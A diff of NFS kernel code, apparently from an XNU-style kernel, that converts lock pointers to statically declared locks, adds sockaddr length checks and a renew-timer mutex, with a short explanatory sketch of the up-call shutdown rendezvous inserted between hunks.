@@ -1130,7 +1130,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
        slp->ns_flag = SLP_VALID | SLP_NEEDQ;
 
        nfsrv_wakenfsd(slp);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        return 0;
 }
@@ -1194,12 +1194,12 @@ nfssvc_nfsd(void)
                return ENOMEM;
        }
        bzero(nfsd, sizeof(struct nfsd));
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        if (nfsd_thread_count++ == 0) {
                nfsrv_initcache();              /* Init the server request cache */
        }
        TAILQ_INSERT_TAIL(&nfsd_head, nfsd, nfsd_chain);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        context.vc_thread = current_thread();
 
@@ -1222,7 +1222,7 @@ nfssvc_nfsd(void)
                } else {
                        /* need to find work to do */
                        error = 0;
-                       lck_mtx_lock(nfsd_mutex);
+                       lck_mtx_lock(&nfsd_mutex);
                        while (!nfsd->nfsd_slp && TAILQ_EMPTY(&nfsrv_sockwait) && TAILQ_EMPTY(&nfsrv_sockwork)) {
                                if (nfsd_thread_count > nfsd_thread_max) {
                                        /*
@@ -1234,7 +1234,7 @@ nfssvc_nfsd(void)
                                }
                                nfsd->nfsd_flag |= NFSD_WAITING;
                                TAILQ_INSERT_HEAD(&nfsd_queue, nfsd, nfsd_queue);
-                               error = msleep(nfsd, nfsd_mutex, PSOCK | PCATCH, "nfsd", &to);
+                               error = msleep(nfsd, &nfsd_mutex, PSOCK | PCATCH, "nfsd", &to);
                                if (error) {
                                        if (nfsd->nfsd_flag & NFSD_WAITING) {
                                                TAILQ_REMOVE(&nfsd_queue, nfsd, nfsd_queue);
@@ -1290,7 +1290,7 @@ nfssvc_nfsd(void)
                                slp->ns_flag |= SLP_WORKQ;
                                lck_rw_done(&slp->ns_rwlock);
                        }
-                       lck_mtx_unlock(nfsd_mutex);
+                       lck_mtx_unlock(&nfsd_mutex);
                        if (!slp) {
                                continue;
                        }
@@ -1495,7 +1495,7 @@ nfssvc_nfsd(void)
                                        }
                                        NFS_ZFREE(nfsrv_descript_zone, nd);
                                        nfsrv_slpderef(slp);
-                                       lck_mtx_lock(nfsd_mutex);
+                                       lck_mtx_lock(&nfsd_mutex);
                                        goto done;
                                }
                                break;
@@ -1553,14 +1553,14 @@ nfssvc_nfsd(void)
                        nfsrv_slpderef(slp);
                }
        }
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 done:
        TAILQ_REMOVE(&nfsd_head, nfsd, nfsd_chain);
        FREE(nfsd, M_NFSD);
        if (--nfsd_thread_count == 0) {
                nfsrv_cleanup();
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
        return error;
 }
 
@@ -1677,8 +1677,8 @@ nfsrv_slpfree(struct nfsrv_sock *slp)
        }
        LIST_INIT(&slp->ns_tq);
 
-       lck_rw_destroy(&slp->ns_rwlock, nfsrv_slp_rwlock_group);
-       lck_mtx_destroy(&slp->ns_wgmutex, nfsrv_slp_mutex_group);
+       lck_rw_destroy(&slp->ns_rwlock, &nfsrv_slp_rwlock_group);
+       lck_mtx_destroy(&slp->ns_wgmutex, &nfsrv_slp_mutex_group);
        FREE(slp, M_NFSSVC);
 }
 
@@ -1734,9 +1734,9 @@ nfsrv_slpderef_locked(struct nfsrv_sock *slp)
 void
 nfsrv_slpderef(struct nfsrv_sock *slp)
 {
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        nfsrv_slpderef_locked(slp);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 }
 
 /*
@@ -1751,7 +1751,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        time_t time_to_wait = nfsrv_sock_idle_timeout;
 
        microuptime(&now);
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 
        /* Turn off the timer if we're supposed to and get out */
        if (nfsrv_sock_idle_timeout < NFSD_MIN_IDLE_TIMEOUT) {
@@ -1759,7 +1759,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        }
        if ((nfsrv_sock_tcp_cnt <= 2 * nfsd_thread_max) || (nfsrv_sock_idle_timeout == 0)) {
                nfsrv_idlesock_timer_on = 0;
-               lck_mtx_unlock(nfsd_mutex);
+               lck_mtx_unlock(&nfsd_mutex);
                return;
        }
 
@@ -1800,7 +1800,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        nfs_interval_timer_start(nfsrv_idlesock_timer_call, time_to_wait * 1000);
        /* Remember when the next timer will fire for nfssvc_addsock. */
        nfsrv_idlesock_timer_on = now.tv_sec + time_to_wait;
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 }
 
 /*
@@ -1832,7 +1832,7 @@ nfsrv_cleanup(void)
        /*
         * Flush pending file write fsevents
         */
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
        for (i = 0; i < NFSRVFMODHASHSZ; i++) {
                for (fp = LIST_FIRST(&nfsrv_fmod_hashtbl[i]); fp; fp = nfp) {
                        /*
@@ -1853,7 +1853,7 @@ nfsrv_cleanup(void)
                }
        }
        nfsrv_fmod_pending = 0;
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
 #endif
 
        nfsrv_uc_cleanup();     /* Stop nfs socket up-call threads */
index b719f88a0b581eab4b7bd908a77c6ad01f06880f..4acf8cf13f864620f7b23af8f6276748734b40f2 100644 (file)
@@ -66,15 +66,15 @@ struct nfsrv_uc_arg {
 TAILQ_HEAD(nfsrv_uc_q, nfsrv_uc_arg);
 
 static struct nfsrv_uc_queue {
-       lck_mtx_t               *ucq_lock;
+       lck_mtx_t               ucq_lock;
        struct nfsrv_uc_q       ucq_queue[1];
        thread_t                ucq_thd;
        uint32_t                ucq_flags;
 } nfsrv_uc_queue_tbl[NFS_UC_HASH_SZ];
 #define NFS_UC_QUEUE_SLEEPING   0x0001
 
-static lck_grp_t *nfsrv_uc_group;
-static lck_mtx_t *nfsrv_uc_shutdown_lock;
+static LCK_GRP_DECLARE(nfsrv_uc_group, "nfs_upcall_locks");
+static LCK_MTX_DECLARE(nfsrv_uc_shutdown_lock, &nfsrv_uc_group);
 static volatile int nfsrv_uc_shutdown = 0;
 static int32_t nfsrv_uc_thread_count;
 
@@ -100,18 +100,18 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
 
        DPRINT("nfsrv_uc_thread %d started\n", qi);
        while (!nfsrv_uc_shutdown) {
-               lck_mtx_lock(myqueue->ucq_lock);
+               lck_mtx_lock(&myqueue->ucq_lock);
 
                while (!nfsrv_uc_shutdown && TAILQ_EMPTY(myqueue->ucq_queue)) {
                        myqueue->ucq_flags |= NFS_UC_QUEUE_SLEEPING;
-                       error = msleep(myqueue, myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL);
+                       error = msleep(myqueue, &myqueue->ucq_lock, PSOCK, "nfsd_upcall_handler", NULL);
                        myqueue->ucq_flags &= ~NFS_UC_QUEUE_SLEEPING;
                        if (error) {
                                printf("nfsrv_uc_thread received error %d\n", error);
                        }
                }
                if (nfsrv_uc_shutdown) {
-                       lck_mtx_unlock(myqueue->ucq_lock);
+                       lck_mtx_unlock(&myqueue->ucq_lock);
                        break;
                }
 
@@ -123,7 +123,7 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
 
                ep->nua_flags &= ~NFS_UC_QUEUED;
 
-               lck_mtx_unlock(myqueue->ucq_lock);
+               lck_mtx_unlock(&myqueue->ucq_lock);
 
 #ifdef NFS_UC_Q_DEBUG
                OSDecrementAtomic(&nfsrv_uc_queue_count);
@@ -133,10 +133,10 @@ nfsrv_uc_thread(void *arg, wait_result_t wr __unused)
                nfsrv_rcv(ep->nua_so, (void *)ep->nua_slp, ep->nua_waitflag);
        }
 
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        nfsrv_uc_thread_count--;
        wakeup(&nfsrv_uc_thread_count);
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 
        thread_terminate(current_thread());
 }
@@ -160,7 +160,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
                return;
        }
        /* If we're queued we might race with nfsrv_uc_thread */
-       lck_mtx_lock(myqueue->ucq_lock);
+       lck_mtx_lock(&myqueue->ucq_lock);
        if (ap->nua_flags & NFS_UC_QUEUED) {
                printf("nfsrv_uc_dequeue remove %p\n", ap);
                TAILQ_REMOVE(myqueue->ucq_queue, ap, nua_svcq);
@@ -171,7 +171,7 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
        }
        FREE(slp->ns_ua, M_TEMP);
        slp->ns_ua = NULL;
-       lck_mtx_unlock(myqueue->ucq_lock);
+       lck_mtx_unlock(&myqueue->ucq_lock);
 }
 
 /*
@@ -180,16 +180,12 @@ nfsrv_uc_dequeue(struct nfsrv_sock *slp)
 void
 nfsrv_uc_init(void)
 {
-       int i;
-
-       nfsrv_uc_group = lck_grp_alloc_init("nfs_upcall_locks", LCK_GRP_ATTR_NULL);
-       for (i = 0; i < NFS_UC_HASH_SZ; i++) {
+       for (int i = 0; i < NFS_UC_HASH_SZ; i++) {
                TAILQ_INIT(nfsrv_uc_queue_tbl[i].ucq_queue);
-               nfsrv_uc_queue_tbl[i].ucq_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL);
+               lck_mtx_init(&nfsrv_uc_queue_tbl[i].ucq_lock, &nfsrv_uc_group, LCK_ATTR_NULL);
                nfsrv_uc_queue_tbl[i].ucq_thd = THREAD_NULL;
                nfsrv_uc_queue_tbl[i].ucq_flags = 0;
        }
-       nfsrv_uc_shutdown_lock = lck_mtx_alloc_init(nfsrv_uc_group, LCK_ATTR_NULL);
 }
 
 /*
@@ -210,9 +206,9 @@ nfsrv_uc_start(void)
        DPRINT("nfsrv_uc_start\n");
 
        /* Wait until previous shutdown finishes */
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        while (nfsrv_uc_shutdown || nfsrv_uc_thread_count > 0) {
-               msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL);
+               msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_wait", NULL);
        }
 
        /* Start up-call threads */
@@ -234,7 +230,7 @@ out:
        nfsrv_uc_queue_count = 0ULL;
        nfsrv_uc_queue_max_seen = 0ULL;
 #endif
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 }
 
 /*
@@ -252,15 +248,15 @@ nfsrv_uc_stop(void)
        /* Signal up-call threads to stop */
        nfsrv_uc_shutdown = 1;
        for (i = 0; i < thread_count; i++) {
-               lck_mtx_lock(nfsrv_uc_queue_tbl[i].ucq_lock);
+               lck_mtx_lock(&nfsrv_uc_queue_tbl[i].ucq_lock);
                wakeup(&nfsrv_uc_queue_tbl[i]);
-               lck_mtx_unlock(nfsrv_uc_queue_tbl[i].ucq_lock);
+               lck_mtx_unlock(&nfsrv_uc_queue_tbl[i].ucq_lock);
        }
 
        /* Wait until they are done shutting down */
-       lck_mtx_lock(nfsrv_uc_shutdown_lock);
+       lck_mtx_lock(&nfsrv_uc_shutdown_lock);
        while (nfsrv_uc_thread_count > 0) {
-               msleep(&nfsrv_uc_thread_count, nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL);
+               msleep(&nfsrv_uc_thread_count, &nfsrv_uc_shutdown_lock, PSOCK, "nfsd_upcall_shutdown_stop", NULL);
        }
 
        /* Deallocate old threads */
@@ -273,7 +269,7 @@ nfsrv_uc_stop(void)
 
        /* Enable restarting */
        nfsrv_uc_shutdown = 0;
-       lck_mtx_unlock(nfsrv_uc_shutdown_lock);
+       lck_mtx_unlock(&nfsrv_uc_shutdown_lock);
 }
 
 /*
@@ -296,13 +292,13 @@ nfsrv_uc_cleanup(void)
        for (i = 0; i < NFS_UC_HASH_SZ; i++) {
                struct nfsrv_uc_queue *queue = &nfsrv_uc_queue_tbl[i];
 
-               lck_mtx_lock(queue->ucq_lock);
+               lck_mtx_lock(&queue->ucq_lock);
                while (!TAILQ_EMPTY(queue->ucq_queue)) {
                        struct nfsrv_uc_arg *ep = TAILQ_FIRST(queue->ucq_queue);
                        TAILQ_REMOVE(queue->ucq_queue, ep, nua_svcq);
                        ep->nua_flags &= ~NFS_UC_QUEUED;
                }
-               lck_mtx_unlock(queue->ucq_lock);
+               lck_mtx_unlock(&queue->ucq_lock);
        }
 
        nfsrv_uc_stop();
@@ -323,11 +319,11 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag)
        int qi = uap->nua_qi;
        struct nfsrv_uc_queue *myqueue = &nfsrv_uc_queue_tbl[qi];
 
-       lck_mtx_lock(myqueue->ucq_lock);
+       lck_mtx_lock(&myqueue->ucq_lock);
        DPRINT("nfsrv_uc_proxy called for %p (%p)\n", uap, uap->nua_slp);
        DPRINT("\tUp-call queued on %d for wakeup of %p\n", qi, myqueue);
        if (uap == NULL || uap->nua_flags & NFS_UC_QUEUED) {
-               lck_mtx_unlock(myqueue->ucq_lock);
+               lck_mtx_unlock(&myqueue->ucq_lock);
                return;  /* Already queued or freed */
        }
 
@@ -355,7 +351,7 @@ nfsrv_uc_proxy(socket_t so, void *arg, int waitflag)
                }
        }
 #endif
-       lck_mtx_unlock(myqueue->ucq_lock);
+       lck_mtx_unlock(&myqueue->ucq_lock);
 }
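The up-call shutdown in this file coordinates through nfsrv_uc_shutdown_lock: each exiting thread decrements nfsrv_uc_thread_count and wakes the waiter, which sleeps until the count drains to zero. A hedged sketch of that rendezvous using the same msleep/wakeup KPI; the names and the PSOCK priority below are illustrative, not taken from the commit:

#include <kern/locks.h>
#include <sys/param.h>   /* PSOCK */
#include <sys/systm.h>   /* msleep, wakeup */

static LCK_GRP_DECLARE(demo_grp, "demo_locks");
static LCK_MTX_DECLARE(demo_shutdown_lock, &demo_grp);
static int32_t demo_thread_count;

/* Called by each worker thread just before it terminates. */
static void
demo_thread_exit(void)
{
	lck_mtx_lock(&demo_shutdown_lock);
	demo_thread_count--;
	wakeup(&demo_thread_count);
	lck_mtx_unlock(&demo_shutdown_lock);
}

/* Called by the controller to wait until every worker has exited. */
static void
demo_wait_for_threads(void)
{
	lck_mtx_lock(&demo_shutdown_lock);
	while (demo_thread_count > 0) {
		msleep(&demo_thread_count, &demo_shutdown_lock, PSOCK,
		    "demo_shutdown_wait", NULL);
	}
	lck_mtx_unlock(&demo_shutdown_lock);
}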
 
 
index 82e3c594c2ec2883fdd8369ec144cb713c7c90b2..482f8f758dbb130b4ae317fd9d1517972a359892 100644 (file)
@@ -134,8 +134,9 @@ ZONE_DECLARE(nfsmnt_zone, "NFS mount",
     sizeof(struct nfsmount), ZC_ZFREE_CLEARMEM);
 
 int nfs_ticks;
-static lck_grp_t *nfs_global_grp, *nfs_mount_grp;
-lck_mtx_t *nfs_global_mutex;
+static LCK_GRP_DECLARE(nfs_global_grp, "nfs_global");
+static LCK_GRP_DECLARE(nfs_mount_grp, "nfs_mount");
+LCK_MTX_DECLARE(nfs_global_mutex, &nfs_global_grp);
 uint32_t nfs_fs_attr_bitmap[NFS_ATTR_BITMAP_LEN];
 uint32_t nfs_object_attr_bitmap[NFS_ATTR_BITMAP_LEN];
 uint32_t nfs_getattr_bitmap[NFS_ATTR_BITMAP_LEN];
@@ -144,8 +145,8 @@ struct nfsclientidlist nfsclientids;
 
 /* NFS requests */
 struct nfs_reqqhead nfs_reqq;
-lck_grp_t *nfs_request_grp;
-lck_mtx_t *nfs_request_mutex;
+LCK_GRP_DECLARE(nfs_request_grp, "nfs_request");
+LCK_MTX_DECLARE(nfs_request_mutex, &nfs_request_grp);
 thread_call_t nfs_request_timer_call;
 int nfs_request_timer_on;
 u_int64_t nfs_xid = 0;
@@ -154,7 +155,7 @@ u_int64_t nfs_xidwrap = 0;              /* to build a (non-wrapping) 64 bit xid
 thread_call_t nfs_buf_timer_call;
 
 /* NFSv4 */
-lck_grp_t *nfs_open_grp;
+LCK_GRP_DECLARE(nfs_open_grp, "nfs_open");
 uint32_t nfs_open_owner_seqnum = 0;
 uint32_t nfs_lock_owner_seqnum = 0;
 thread_call_t nfs4_callback_timer_call;
@@ -162,8 +163,8 @@ int nfs4_callback_timer_on = 0;
 char nfs4_default_domain[MAXPATHLEN];
 
 /* nfsiod */
-lck_grp_t *nfsiod_lck_grp;
-lck_mtx_t *nfsiod_mutex;
+static LCK_GRP_DECLARE(nfsiod_lck_grp, "nfsiod");
+LCK_MTX_DECLARE(nfsiod_mutex, &nfsiod_lck_grp);
 struct nfsiodlist nfsiodfree, nfsiodwork;
 struct nfsiodmountlist nfsiodmounts;
 int nfsiod_thread_count = 0;
@@ -322,26 +323,11 @@ nfs_vfs_init(__unused struct vfsconf *vfsp)
        TAILQ_INIT(&nfsiodfree);
        TAILQ_INIT(&nfsiodwork);
        TAILQ_INIT(&nfsiodmounts);
-       nfsiod_lck_grp = lck_grp_alloc_init("nfsiod", LCK_GRP_ATTR_NULL);
-       nfsiod_mutex = lck_mtx_alloc_init(nfsiod_lck_grp, LCK_ATTR_NULL);
-
-       /* init lock groups, etc. */
-       nfs_mount_grp = lck_grp_alloc_init("nfs_mount", LCK_GRP_ATTR_NULL);
-       nfs_open_grp = lck_grp_alloc_init("nfs_open", LCK_GRP_ATTR_NULL);
-       nfs_global_grp = lck_grp_alloc_init("nfs_global", LCK_GRP_ATTR_NULL);
-
-       nfs_global_mutex = lck_mtx_alloc_init(nfs_global_grp, LCK_ATTR_NULL);
-
-       /* init request list mutex */
-       nfs_request_grp = lck_grp_alloc_init("nfs_request", LCK_GRP_ATTR_NULL);
-       nfs_request_mutex = lck_mtx_alloc_init(nfs_request_grp, LCK_ATTR_NULL);
 
        /* initialize NFS request list */
        TAILQ_INIT(&nfs_reqq);
 
        nfs_nbinit();                   /* Init the nfsbuf table */
-       nfs_nhinit();                   /* Init the nfsnode table */
-       nfs_lockinit();                 /* Init the nfs lock state */
 #if CONFIG_NFS_GSS
        nfs_gss_init();                 /* Init RPCSEC_GSS security */
 #endif
@@ -1777,12 +1763,22 @@ nfs_convert_old_nfs_args(mount_t mp, user_addr_t data, vfs_context_t ctx, int ar
 
        /* convert address to universal address string */
        if (ss.ss_family == AF_INET) {
-               sinaddr = &((struct sockaddr_in*)&ss)->sin_addr;
+               if (ss.ss_len != sizeof(struct sockaddr_in)) {
+                       error = EINVAL;
+               } else {
+                       sinaddr = &((struct sockaddr_in*)&ss)->sin_addr;
+               }
        } else if (ss.ss_family == AF_INET6) {
-               sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr;
+               if (ss.ss_len != sizeof(struct sockaddr_in6)) {
+                       error = EINVAL;
+               } else {
+                       sinaddr = &((struct sockaddr_in6*)&ss)->sin6_addr;
+               }
        } else {
                sinaddr = NULL;
        }
+       nfsmout_if(error);
+
        if (!sinaddr || (inet_ntop(ss.ss_family, sinaddr, uaddr, sizeof(uaddr)) != uaddr)) {
                error = EINVAL;
                goto nfsmout;
@@ -2377,6 +2373,7 @@ nfs4_mount(
 
        *npp = NULL;
        fh.fh_len = dirfh.fh_len = 0;
+       lck_mtx_init(&nmp->nm_timer_lock, &nfs_mount_grp, LCK_ATTR_NULL);
        TAILQ_INIT(&nmp->nm_open_owners);
        TAILQ_INIT(&nmp->nm_delegations);
        TAILQ_INIT(&nmp->nm_dreturnq);
@@ -2776,7 +2773,7 @@ gotfh:
        }
 
        /* set up lease renew timer */
-       nmp->nm_renew_timer = thread_call_allocate(nfs4_renew_timer, nmp);
+       nmp->nm_renew_timer = thread_call_allocate_with_options(nfs4_renew_timer, nmp, THREAD_CALL_PRIORITY_HIGH, THREAD_CALL_OPTIONS_ONCE);
        interval = nmp->nm_fsattr.nfsa_lease / 2;
        if (interval < 1) {
                interval = 1;
@@ -2990,7 +2987,7 @@ mountnfs(
        } else {
                /* allocate an NFS mount structure for this mount */
                nmp = zalloc_flags(nfsmnt_zone, Z_WAITOK | Z_ZERO);
-               lck_mtx_init(&nmp->nm_lock, nfs_mount_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&nmp->nm_lock, &nfs_mount_grp, LCK_ATTR_NULL);
                TAILQ_INIT(&nmp->nm_resendq);
                TAILQ_INIT(&nmp->nm_iodq);
                TAILQ_INIT(&nmp->nm_gsscl);
@@ -4583,7 +4580,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr)
                vfs_unmountbyfsid(&hinfo.fsid, 0, vfs_context_kernel());
        }
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (!hinfo.mountcount) {
                /* no more ephemeral mounts - don't need timer */
                nfs_ephemeral_mount_harvester_on = 0;
@@ -4593,7 +4590,7 @@ nfs_ephemeral_mount_harvester(__unused void *arg, __unused wait_result_t wr)
                thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline);
                nfs_ephemeral_mount_harvester_on = 1;
        }
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        /* thread done */
        thread_terminate(current_thread());
@@ -4607,9 +4604,9 @@ nfs_ephemeral_mount_harvester_start(void)
 {
        uint64_t deadline;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nfs_ephemeral_mount_harvester_on) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        if (nfs_ephemeral_mount_harvester_timer == NULL) {
@@ -4618,7 +4615,7 @@ nfs_ephemeral_mount_harvester_start(void)
        clock_interval_to_deadline(NFS_EPHEMERAL_MOUNT_HARVEST_INTERVAL, NSEC_PER_SEC, &deadline);
        thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline);
        nfs_ephemeral_mount_harvester_on = 1;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 #endif
@@ -4635,7 +4632,10 @@ nfs3_check_lockmode(struct nfsmount *nmp, struct sockaddr *sa, int sotype, int t
        int error, port = 0;
 
        if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) {
-               bcopy(sa, &ss, sa->sa_len);
+               if (sa->sa_len > sizeof(ss)) {
+                       return EINVAL;
+               }
+               bcopy(sa, &ss, MIN(sa->sa_len, sizeof(ss)));
                error = nfs_portmap_lookup(nmp, vfs_context_current(), (struct sockaddr*)&ss, NULL, RPCPROG_STAT, RPCMNT_VER1, NM_OMFLAG(nmp, MNTUDP) ? SOCK_DGRAM : sotype, timeo);
                if (!error) {
                        if (ss.ss_family == AF_INET) {
@@ -5077,10 +5077,13 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
 
        /* cancel any renew timer */
        if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_renew_timer) {
+               lck_mtx_lock(&nmp->nm_timer_lock);
                thread_call_cancel(nmp->nm_renew_timer);
                thread_call_free(nmp->nm_renew_timer);
                nmp->nm_renew_timer = NULL;
+               lck_mtx_unlock(&nmp->nm_timer_lock);
        }
+
 #endif
        lck_mtx_unlock(&nmp->nm_lock);
 
@@ -5102,14 +5105,14 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
 #if CONFIG_NFS4
        if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_longid) {
                /* remove/deallocate the client ID data */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
                TAILQ_REMOVE(&nfsclientids, nmp->nm_longid, nci_link);
                if (nmp->nm_longid->nci_id) {
                        FREE(nmp->nm_longid->nci_id, M_TEMP);
                }
                FREE(nmp->nm_longid, M_TEMP);
                nmp->nm_longid = NULL;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
        }
 #endif
        /*
@@ -5117,7 +5120,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
         * and removed from the resend queue.
         */
        TAILQ_INIT(&resendq);
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmp == nmp) {
                        lck_mtx_lock(&req->r_mtx);
@@ -5142,7 +5145,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
                        lck_mtx_unlock(&req->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* Since we've dropped the request mutex we can now safely unreference the request */
        TAILQ_FOREACH_SAFE(req, &resendq, r_rchain, treq) {
@@ -5159,8 +5162,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
         * local iod queue for processing.
         */
        TAILQ_INIT(&iodq);
-       lck_mtx_lock(nfs_request_mutex);
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmp == nmp) {
                        lck_mtx_lock(&req->r_mtx);
@@ -5188,8 +5191,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags)
                TAILQ_REMOVE(&nfsiodmounts, nmp, nm_iodlink);
        }
        TAILQ_CONCAT(&iodq, &nmp->nm_iodq, r_achain);
-       lck_mtx_unlock(nfsiod_mutex);
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfsiod_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) {
                TAILQ_REMOVE(&iodq, req, r_achain);
@@ -5294,11 +5297,17 @@ nfs_mount_cleanup(struct nfsmount *nmp)
 
        lck_mtx_unlock(&nmp->nm_lock);
 
-       lck_mtx_destroy(&nmp->nm_lock, nfs_mount_grp);
+       lck_mtx_destroy(&nmp->nm_lock, &nfs_mount_grp);
        if (nmp->nm_fh) {
                NFS_ZFREE(nfs_fhandle_zone, nmp->nm_fh);
        }
 
+#if CONFIG_NFS4
+       if (nmp->nm_vers >= NFS_VER4) {
+               lck_mtx_destroy(&nmp->nm_timer_lock, &nfs_mount_grp);
+       }
+#endif
+
 
        NFS_ZFREE(nfsmnt_zone, nmp);
 }
@@ -6685,7 +6694,7 @@ ustat_skip:
                 * how long the threads have been waiting.
                 */
 
-               lck_mtx_lock(nfs_request_mutex);
+               lck_mtx_lock(&nfs_request_mutex);
                lck_mtx_lock(&nmp->nm_lock);
 
                /*
@@ -6704,19 +6713,19 @@ ustat_skip:
 
                if (req->oldptr == USER_ADDR_NULL) {            // Caller is querying buffer size
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return SYSCTL_OUT(req, NULL, totlen);
                }
                if (req->oldlen < totlen) {     // Check if caller's buffer is big enough
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return ERANGE;
                }
 
                MALLOC(nsp, struct netfs_status *, totlen, M_TEMP, M_WAITOK | M_ZERO);
                if (nsp == NULL) {
                        lck_mtx_unlock(&nmp->nm_lock);
-                       lck_mtx_unlock(nfs_request_mutex);
+                       lck_mtx_unlock(&nfs_request_mutex);
                        return ENOMEM;
                }
                timeoutmask = NFSSTA_TIMEO | NFSSTA_LOCKTIMEO | NFSSTA_JUKEBOXTIMEO;
@@ -6760,7 +6769,7 @@ ustat_skip:
                }
 
                lck_mtx_unlock(&nmp->nm_lock);
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
 
                error = SYSCTL_OUT(req, nsp, totlen);
                FREE(nsp, M_TEMP);
index b03463b43b07dd51c4b72c14687de27effd85bb9..caa5533f53bbf8e9db612e93f442eb7ed7d20cc3 100644 (file)
@@ -4481,13 +4481,13 @@ again_relock:
        }
 
        /* lock the node while we remove the file */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        while (np->n_hflag & NHLOCKED) {
                np->n_hflag |= NHLOCKWANT;
-               msleep(np, nfs_node_hash_mutex, PINOD, "nfs_remove", NULL);
+               msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_remove", NULL);
        }
        np->n_hflag |= NHLOCKED;
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        if (!namedattrs) {
                nfs_dulookup_init(dul, dnp, cnp->cn_nameptr, cnp->cn_namelen, ctx);
@@ -4510,13 +4510,13 @@ again:
        if (!inuse || (np->n_sillyrename && (nvattr->nva_nlink > 1))) {
                if (!inuse && !flushed) { /* flush all the buffers first */
                        /* unlock the node */
-                       lck_mtx_lock(nfs_node_hash_mutex);
+                       lck_mtx_lock(&nfs_node_hash_mutex);
                        np->n_hflag &= ~NHLOCKED;
                        if (np->n_hflag & NHLOCKWANT) {
